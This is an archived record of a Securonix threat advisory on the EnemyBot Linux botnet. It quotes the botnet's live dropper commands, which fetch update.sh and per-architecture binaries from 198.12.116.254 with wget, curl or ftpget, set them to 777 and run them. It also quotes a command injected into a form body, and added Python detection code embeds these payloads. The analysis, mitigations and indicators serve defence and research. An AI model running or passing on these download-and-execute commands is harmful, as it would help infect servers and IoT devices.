{
	"id": "c5a6e459-b658-48c8-96e2-4b32d8a9505a",
	"created_at": "2026-04-06T00:14:09.389053Z",
	"updated_at": "2026-04-10T13:12:50.020123Z",
	"deleted_at": null,
	"sha1_hash": "c100c018278b01cd367d43375ba559f3339bc3c3",
	"title": "Detecting EnemyBot – Securonix Initial Coverage Advisory",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 965744,
	"plain_text": "Detecting EnemyBot – Securonix Initial Coverage Advisory\r\nArchived: 2026-04-02 12:10:08 UTC\r\nBy Securonix Threat Labs, Threat Research: Oleg Kolesnikov, Den Iuzvyk, and Tim Peck\r\nIntroduction\r\nOur researchers have identified EnemyBot, a new Linux-based botnet. Judging by the initial infection, it targets a wide range of devices and platforms. This report covers technical details including its origin and functionality.\r\nInitial Infection\r\n|echo;cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /data || cd /root || cd /; wget http://198.12.116.254/update.sh -O update.sh; busybox wget http://198.12.116.254/update.sh -O update.sh; curl http://198.12.116.254/update.sh -O update.sh; chm\r\nThe initial infection was identified as a drive-by request to /shell on a web server, with the payload above carried in the “value” parameter (the captured payload is cut off at “chm”). The payload first changes into one of several writable directories (/tmp first, then /home/$USER, /var/run, /mnt, /data, /root and finally /) and then attempts to download an “update.sh” file using several methods in turn: wget, busybox wget, and curl, so that the chain still succeeds on hosts where only some of those tools exist.\r\nTaking a closer look at the update.sh script, it attempts to download 13 different ELF binaries, each compiled for a different system architecture. The architecture type is appended to the end of the name “enemybot”. Given the wide range of supported architectures, at first glance this botnet should be effective against Linux-based hosts ranging from servers to IoT devices. 
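As an added example (not code from the Securonix advisory), the following Python parses dropper one-liners of the kind shown above and flags the /shell drive-by in a web server access log. It embeds the first-stage payload as quoted (without its leading pipe character, and still cut off at “chm”) together with the enemybotx86 line of update.sh; the Apache combined-format log lines, client addresses and timestamps are constructed for the example.

```python
from urllib.parse import quote_plus, unquote_plus, urlsplit

DROPPER_HOST = '198.12.116.254'
DOWNLOADERS = ('wget', 'curl', 'ftpget', 'tftp')
DQ = chr(34)  # the double-quote character that delimits the request field

# First-stage payload as quoted in the advisory (it is cut off at 'chm')
INITIAL_PAYLOAD = (
    'echo;cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /data || cd /root || cd /; '
    'wget http://198.12.116.254/update.sh -O update.sh; '
    'busybox wget http://198.12.116.254/update.sh -O update.sh; '
    'curl http://198.12.116.254/update.sh -O update.sh; chm'
)

# One line of update.sh as quoted in the advisory
UPDATE_SH_X86 = (
    'wget http://198.12.116.254/folder/enemybotx86 -o enemybotx86; '
    'busybox wget http://198.12.116.254/folder/enemybotx86 -o enemybotx86; '
    'curl http://198.12.116.254/folder/enemybotx86 -o enemybotx86; '
    'busybox curl http://198.12.116.254/folder/enemybotx86 -o enemybotx86; '
    'ftpget -v -u anonymous -p anonymous -P 21 198.12.116.254 enemybotx86 enemybotx86; '
    'busybox ftpget -v -u anonymous -p anonymous -P 21 198.12.116.254 enemybotx86 enemybotx86; '
    'chmod 777 enemybotx86; ./enemybotx86; rm -rf enemybotx86'
)

def split_stages(command):
    '''Split a semicolon-chained shell one-liner into its individual commands.'''
    return [s.strip() for s in command.split(';') if s.strip()]

def parse_dropper_line(command):
    '''Describe one dropper line: download tools tried, hosts contacted, the file
    it targets, its architecture suffix, and whether it follows the
    download -> chmod 777 -> execute -> delete pattern.'''
    stages = split_stages(command)
    tools, urls, target = set(), [], None
    for stage in stages:
        tokens = stage.split()
        # BusyBox applets are invoked as 'busybox wget ...'
        name = tokens[1] if tokens[0] == 'busybox' and len(tokens) > 1 else tokens[0]
        if name in DOWNLOADERS:
            tools.add(name)
        urls.extend(t for t in tokens if t.startswith('http://') or t.startswith('https://'))
        if len(tokens) == 3 and tokens[:2] == ['chmod', '777']:
            target = tokens[2]
    executes = target is not None and ('./' + target) in stages
    deletes = target is not None and any(
        s.split()[0] == 'rm' and s.split()[-1] == target for s in stages)
    arch = target[len('enemybot'):] if target and target.startswith('enemybot') else None
    return {
        'tools': sorted(tools),
        'hosts': sorted({urlsplit(u).hostname for u in urls}),
        'target': target,
        'arch': arch,
        'drop_and_run': executes and deletes,
    }

def suspicious_request(request_line):
    '''Score a raw HTTP request line for the EnemyBot drive-by pattern and return
    the matched indicators; two or more is treated as a hit.'''
    _method, _, rest = request_line.partition(' ')
    path = rest.rsplit(' ', 1)[0]  # drop the trailing HTTP/1.x protocol tag
    decoded = unquote_plus(path)   # the payload arrives URL-encoded
    indicators = []
    if decoded.count('|| cd /') >= 2:
        indicators.append('directory-hopping cd chain')
    if any(tool + ' http' in decoded or 'busybox ' + tool in decoded for tool in DOWNLOADERS):
        indicators.append('download tool in request')
    if DROPPER_HOST in decoded:
        indicators.append('known dropper host')
    if 'chmod 777' in decoded:
        indicators.append('chmod 777')
    return indicators

def scan_access_log(lines):
    '''Return (client_ip, indicators) for each Apache combined-format log line
    whose request matches two or more indicators.'''
    hits = []
    for line in lines:
        start = line.find(DQ)
        end = line.find(DQ, start + 1)
        if start < 0 or end < 0:
            continue
        indicators = suspicious_request(line[start + 1:end])
        if len(indicators) >= 2:
            hits.append((line.split(' ', 1)[0], indicators))
    return hits

# Constructed log lines: client addresses and timestamps are made up; the first
# request carries the quoted payload in the value parameter, URL-encoded as a
# scanner would send it.
SAMPLE_LOG = [
    '203.0.113.9 - - [05/Apr/2022:10:14:33 +0000] ' + DQ + 'GET /shell?value='
    + quote_plus(INITIAL_PAYLOAD) + ' HTTP/1.1' + DQ + ' 404 196',
    '198.51.100.4 - - [05/Apr/2022:10:14:40 +0000] ' + DQ + 'GET /index.html HTTP/1.1' + DQ + ' 200 1043',
]
```

The detector decodes the request before matching because the payload arrives URL-encoded; matching on the raw line would miss it. Two indicators are required so that a request that merely mentions wget is not flagged on its own, and the known dropper host is only one of the signals, so a change of hosting address does not blind the rule.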
\r\nenemybotmips\r\nenemybotmpsl\r\nenemybotsh4\r\nenemybotx86\r\nenemybotarm7\r\nenemyboti686\r\nenemybotppc\r\nenemyboti586\r\nenemybotm68k\r\nenemybotspc\r\nenemybotarm\r\nenemybotarm5\r\nenemybotppc-440fp\r\nEach line of the script attempts to download one binary (again using several methods: wget, busybox wget, curl, busybox curl, and ftpget and busybox ftpget over anonymous FTP on port 21), sets its permissions to world-readable, -writable and -executable (777), executes it from /tmp/, and then deletes the original ELF binary.\r\nhttps://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/\r\nPage 1 of 8\n\nwget http://198.12.116.254/folder/enemybotx86 -o enemybotx86; busybox wget http://198.12.116.254/folder/enemybotx86 -o enemybotx86; curl http://198.12.116.254/folder/enemybotx86 -o enemybotx86; busybox curl http://198.12.116.254/folder/enemybotx86 -o enemybotx86; ftpget -v -u anonymous -p anonymous -P 21 198.12.116.254 enemybotx86 enemybotx86; busybox ftpget -v -u anonymous -p anonymous -P 21 198.12.116.254 enemybotx86 enemybotx86; chmod 777 enemybotx86; ./enemybotx86; rm -rf enemybotx86\r\nNote that this stage passes lowercase -o to wget; in GNU wget, -o names the log file rather than the output document, which is -O as the first stage used for update.sh. For curl, -o is the output file.\r\nStage 2 – Pulling Back the Curtain\r\nFirst, we take a look at the “enemybotx86” file, since it matches the architecture of our analysis system and so gives us the best chance of executing it in a sandbox.\r\nAccording to exiftool, the file is indeed a binary executable in ELF format (a Linux executable).\r\nTo get a general idea of what this binary might be doing, we run it through strings and look for anything interesting. 
The word “enemy” appears again and again, and in one case it is hex formatted (the escaped bytes decode to “enemy”):\r\nSome other noteworthy and rather curious strings include:\r\n/Game/Mods/TheCenter/TheCenter_A1_NearB\r\n/Game/Maps/TheIslandSubMaps/MasterIBLCaptures\r\n/Game/Maps/TheIslandSubMaps/E3_Far_WIP\r\necho -e “\\x65\\x6e\\x65\\x6d\\x79”\r\ncmac=12%%3Aaf%%3Aaa%%3Abb%%3Acc%%3Add\u0026submit_button=status_guestnet.asp%%0A\r\nwget+http%%3A%%2F%%2F198.12.116.254%%2Fupdate.sh+-O-\r\n+%%7C+sh%%0Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%%10%%A6G%%00\u0026cip=192.168.100.1\r\nDetermined we already have a instance running on this system!\r\nBinded and listening on address %d.%d.%d.%d\r\ndecodedshit\r\nwatudoinglookingatdis\r\nThe URL-encoded string is a templated HTTP form body: the doubled percent signs are the printf-style escape for a literal percent sign, and once rendered and decoded its submit_button field holds status_guestnet.asp followed by a newline and wget http://198.12.116.254/update.sh -O- | sh, the same update.sh download used in the initial infection.\r\nLooking for function names, one that stood out was “watudoinglookingatdis”. Maybe a hello to future researchers?\r\nWalking through the decompiled binary, it appears to feature a host of networking functions such as port scanners, TCP/UDP flood options and general system enumeration. Much of the code appears to be encrypted, and we encountered some counter-forensics measures that can make static analysis problematic.\r\nThe EnemyBot malware also appears to be able to exfiltrate data via HTTP POST; in our case the malware sent the data back to the original IP address.\r\nThe export names alone give a much better picture of what this particular botnet is capable of.\r\nOn further analysis, we find a number of flags that appear to be passed in as arguments, including destination IP, source IP, destination port, source port, data payload, and packet count, consistent with the flood and scanning functions. 
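To make the URL-encoded string above readable, here is an added Python example (not part of the advisory) that renders the template and decodes the form body it produces. It assumes that the three extracted lines form one string in the binary and that the doubled percent signs are printf-style escapes; nothing else about the binary is assumed.

```python
from urllib.parse import unquote_to_bytes

# The three extracted lines joined in order; that they form one string in the
# binary is an assumption of this example.
EMBEDDED_TEMPLATE = (
    'cmac=12%%3Aaf%%3Aaa%%3Abb%%3Acc%%3Add&submit_button=status_guestnet.asp%%0A'
    'wget+http%%3A%%2F%%2F198.12.116.254%%2Fupdate.sh+-O-'
    '+%%7C+sh%%0Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%%10%%A6G%%00&cip=192.168.100.1'
)

def render_format_template(template):
    '''Collapse printf-style %% escapes to a literal %. The template contains
    no other conversion specifiers, so nothing else is substituted.'''
    return template.replace('%%', '%')

def decode_form_body(body):
    '''Decode an application/x-www-form-urlencoded body into field -> bytes.
    Bytes rather than str because the payload carries 0x10, 0xA6 and a NUL.'''
    fields = {}
    for pair in body.split('&'):
        key, _, value = pair.partition('=')
        # '+' is a space in form encoding; unquote_to_bytes alone does not do that
        fields[key] = unquote_to_bytes(value.replace('+', ' '))
    return fields

def decode_template(template):
    '''Render the template, then decode the resulting form body.'''
    return decode_form_body(render_format_template(template))

def extract_injected_commands(template):
    '''A well-formed form value has no line breaks, so any line after the first
    inside a field is injected. Return the injected lines that begin with a
    download tool or a shell.'''
    commands = []
    for value in decode_template(template).values():
        for line in value.splitlines()[1:]:
            text = line.decode('latin-1').strip()
            if text.split(' ', 1)[0] in ('wget', 'curl', 'busybox', 'sh'):
                commands.append(text)
    return commands
```

Keeping the field values as bytes matters: the tail of the submit_button value is binary filler (0x10 0xA6 G NUL) that a str-based decoder would mangle or replace, and the cmac field decodes to a plain MAC address, which is why the command has to be found by looking for embedded line breaks rather than by field name.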
\r\nThe malware also performs a system check to determine whether another instance is already running. After the instance starts there are two possible outputs:\r\n“Determined we already have a instance running…”\r\n“Binded and listen on address %d.%d.%d.%d.\\n”\r\nDynamic analysis of the EnemyBot malware did not yield anything useful, as the sample killed itself soon after execution. There appear to be baked-in counter-forensics checks that terminate the process when certain analysis process names are detected.\r\nConclusion\r\nThe EnemyBot malware follows structures and patterns similar to those of other common botnets, with a few changes. There is a strong overlap with the LolFMe botnet, which contains similar strings such as “watudoinglookingatdis”. The LolFMe botnet was short-lived and never widespread, so it will be interesting to see how far this particular strain gets off the ground.\r\nBoth LolFMe and Mirai leverage multi-architecture support and RCE as the initial foothold. This is also the case for EnemyBot.\r\nMitigation – Securonix Recommendations\r\nThe following actions can help proactively mitigate the impact of EnemyBot attacks on your network. 
\r\nEnsure systems are fully patched and not vulnerable to RCE\r\nPatch IoT devices’ firmware to the latest versions to mitigate external exploitation\r\nEmploy layer-7 network monitoring and detection to catch common exploits that leverage RCE\r\nEnsure that externally exposed network segments are isolated from internal hosts\r\nDisable or limit execution from Linux /tmp/ directories, for example by mounting /tmp with the noexec option; note that the first stage falls back to /home/$USER, /var/run, /mnt, /data and /root when /tmp is unavailable, so noexec on /tmp alone only removes the dropper’s first choice\r\nDetection and Indicators of Compromise (IoCs):\r\nFile name, followed by the sha256 of each sample observed under that name (two samples are listed per binary name):\r\nupdate.sh\r\n  cc36cc84d575e953359d82e8716c37ba2cbf20c6d63727ca9e83b53493509723\r\nenemybotarm\r\n  52421da5ee839c9bde689312ff35f10e9bcab7edccc12ee1fe16630e20531aaf\r\n  adb51a8d112590a6fdd02ac8d812b837bbe0fcdd762dba6bbba0bd0b538f9aef\r\nenemybotarm5\r\n  498ecf2ce03960a695d4ba92d4d2e6163917686db29393c4b8d8c9d11d19774d\r\n  5e56210f15b653e4ea881f25bfa423af4f4c5ee3a7c9386543fde23e0e7169c8\r\nenemybotarm7\r\n  7ccffe7a3daa58db665db93f816ab0b5a4e9ce0bc7a2490d885250d267ed4bbc\r\n  7635758818ca966288ad10fb3d385c177f8cd5554369eeb28f8b52951004ed89\r\nenemyboti586\r\n  f3c4ca5ba23d27a4d297dfef8614b48bbaca6455814d537114f4e6d418f10f47\r\n  d9204c9b5018a3028d5c7f966d8c37be9d7d4dd2c5c4cd95cde686cce655c609\r\nenemyboti686\r\n  ae9cc1b644ee435bddc57af2eeab05fb0ba0dc2f81473611bd2f39c1d9be1d1c\r\n  d0b9e7bbf034e501872ecb276b3b670ae175fff09618d9836356d47f677bdbbc\r\nenemybotm68k\r\n  5dba7e81c4a03eedee4a33535cfda88d8d178658d0e434ee48bd29d7091c63b5\r\n  e4bdf0d87db133824ff183c28c860c08794394eaaf76898899cbeb5f9749ae1f\r\nenemybotmips\r\n  22db83f9cc631eb3222444328289a3be787c3a8182ccd8004c6cc2b5dc50a12d\r\n  aeb9f6999fdc3a3dadbe93ff8a1a2de3ac181b43eddcf208c018db88526b5314\r\nenemybotmpsl\r\n  c275a1ec95142b7134d7beb153e6126bda9087c152e69497f1990c39d5045399\r\n  6dbb0e96180d0946ddd9ff17908cf830fbff5016ff013891e3fdf3c3b33ef2e6\r\nenemybotppc\r\n  ea2ff0c01629bdaecceecc59d93de73f01b7b18146986be114503c086fa29976\r\n  7ec1fab277b86e022819c9b5a53be05df2af76c5c19b2aa1cf26590d06dcdbcd\r\nenemybotppc-440fp\r\n  908a95c887d4c46e5058db09e85efba023219793b54b5cd7ea03e1b450784111\r\n  a33145dc629c7ca76dc5ec0138fe60b06e8c53bd01f1bb90d9a7e21ff0a391e6\r\nenemybotsh4\r\n  9bb46cfa321d5aa65960fa4563a50eec40de4e221e360162bae4b4e4b40a3540\r\n  058d36172d25e7b3db227c02ffba5be3d1b17d0eef7bfd4029c55b16ac2ab06b\r\nenemybotspc\r\n  f36ade94ba4261fdff37d53c7d7c4935374d9263ec4fe92d2bb6c1def5f0783f\r\n  b2c92609557eaabe108689a17996befeabb48da70053ae6335a1fcd0c1189249\r\nenemybotx86\r\n  1a7316d9bb8449cf93a19925c470cc4dbfd95a99c03b10f4038bb2a517d6ed50\r\n  12e907fae4427a7b0d68adfb33a5e045971bd755f8b7a48299a27736c24c9929\r\nIP communication observed:\r\n198.12.116.254\r\nPlease look out for updates on search queries and detection content from Securonix Threat Labs.\r\nWe also invite you to send your questions regarding any security advisories to the Securonix Critical Intelligence Advisory team and look forward to being of assistance.\r\nSource: https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/"
	],
	"report_names": [
		"detecting-the-enemybot-botnet-advisory"
	],
	"threat_actors": [],
	"ts_created_at": 1775434449,
	"ts_updated_at": 1775826770,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c100c018278b01cd367d43375ba559f3339bc3c3.pdf",
		"text": "https://archive.orkl.eu/c100c018278b01cd367d43375ba559f3339bc3c3.txt",
		"img": "https://archive.orkl.eu/c100c018278b01cd367d43375ba559f3339bc3c3.jpg"
	}
}